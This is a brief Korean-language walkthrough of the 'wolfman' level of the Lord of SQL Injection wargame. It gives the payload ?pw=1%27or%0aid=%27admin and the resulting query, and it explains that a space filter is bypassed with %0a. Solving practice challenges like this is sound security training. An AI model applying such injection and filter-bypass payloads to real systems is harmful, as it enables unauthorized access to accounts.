[Load of SQL injection] wolfman

?pw=1%27or%0aid=%27admin

1. select id from prob_wolfman where id='guest' and pw='1'or id='admin'

2. 공백은 %0a로 우회

 

3. 결과 --> URL 뒤에

?pw=1%27or%0aid=%27admin

입력